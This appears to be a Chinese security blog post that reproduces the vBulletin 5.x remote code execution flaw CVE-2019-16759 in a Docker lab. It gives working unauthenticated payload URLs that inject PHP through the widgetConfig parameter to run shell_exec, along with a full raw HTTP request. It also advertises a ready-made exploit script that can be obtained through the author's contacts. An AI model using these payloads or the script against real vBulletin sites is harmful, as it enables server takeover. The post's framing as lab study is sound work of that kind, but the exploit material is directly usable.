vBulletin 5.x RCE漏洞复现 CVE-2019-16759

  • A+
所属分类:安全文章

一、环境搭建:

启动环境:

docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808

vBulletin 5.x RCE漏洞复现 CVE-2019-16759

进入容器修改配置:

docker exec -it 54e406047f4a /bin/bash

更新apt源,然后装vim

apt-get updateapt install vim

修改配置:

vim /etc/apache2/apache2.conf

# 最后一行补这个配置

ServerName localhost:80

vBulletin 5.x RCE漏洞复现 CVE-2019-16759

给根目录下的run.sh加上执行权限并启动:

chmod +x ./run.sh./run.sh


然后漏洞环境就搭建完成了



二、漏洞描述:

vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区。vBulletin高效,稳定,安全,在中国也有很多大型客户,比如蜂鸟网,51团购,海洋部落等在线上万人的论坛都用vBulletin。vBulletin的官方网站是 http://www.vBulletin.com 它不是免费软件,但价格很低。

vBulletin 5.x 爆出一个前台远程代码执行漏洞,无需登录即可触发



三、漏洞复现:

http://xxx.com/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig=phpinfo();exit;

可以看到phpinfo成功被执行:

vBulletin 5.x RCE漏洞复现 CVE-2019-16759




RCE Payload:

http://xxx.com/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig=echo%20shell_exec(%22id%22);exit;

请求数据包:

GET /?routestring=ajax%2Frender%2Fwidget_php&widgetConfig=echo%20shell_exec(%22id%22);exit; HTTP/1.1Host: 192.168.136.143User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: close

执行结果:

vBulletin 5.x RCE漏洞复现 CVE-2019-16759



四、自写漏洞EXP:

支持漏洞检测、RCE利用

python3 CVE-2019-16759_EXP.py target_domain

执行结果:

vBulletin 5.x RCE漏洞复现 CVE-2019-16759


脚本已经打包好了,需要的看官后台留言:vBulletin exp,链接有效期为7天,请注意保存,请仅用于学习研究!


各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

vBulletin 5.x RCE漏洞复现 CVE-2019-16759

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: